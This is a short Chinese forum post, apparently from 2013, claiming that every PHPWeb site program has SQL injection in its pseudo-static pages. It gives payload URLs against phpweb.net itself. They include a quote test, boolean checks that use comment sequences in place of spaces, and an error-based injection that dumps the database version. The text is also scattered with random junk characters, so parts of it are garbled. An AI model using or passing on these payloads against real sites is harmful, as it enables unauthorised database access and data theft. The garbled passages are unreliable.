phpweb所有的整站程序伪静态页面都存在sql注入
t! `, t5 C) p3 n2 J0 n5 @! E$ o v7 y( v6 y8 T, J
主站:http://phpweb.net/& x n$ Q/ Y7 M. P8 K
加’检测:' v- u' t, T, Z" H1 I
1 g. x: I; J/ g& U2 }. A
http://www.phpweb.net/down/html/?772′.html
( U% X1 e, k. E6 [9 {0 i & A: l" O0 D7 C3 o4 f M9 N" b
出错5 @) q) E; t3 {, d- o
存在注入。$ y$ b$ ^- t6 E- t% _
不能用空格,只能用/*罗
; X j, p4 @" l% khttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
3 B8 {6 l9 Y/ X& p# y
0 E+ u1 Z- q( s) g) uhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错., Z1 ~* R Q. r' Q# ^
爆数据库版本:
5 [2 o; E/ w$ w- |5 c4 Q9 f6 \0 {
7 t; H& r4 Y7 j P?
* n5 ~+ b) n, x0 _9 G1
& `1 k2 l1 g% e2 ^: v, khttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
8 T( T/ @ W/ B6 ~/ Y更新日期: 2013-01-03 13:39:50 }0 }+ Y+ L% y- ^) r& w! I
|
发表于 2013-1-4 19:46:42
收藏
支持
反对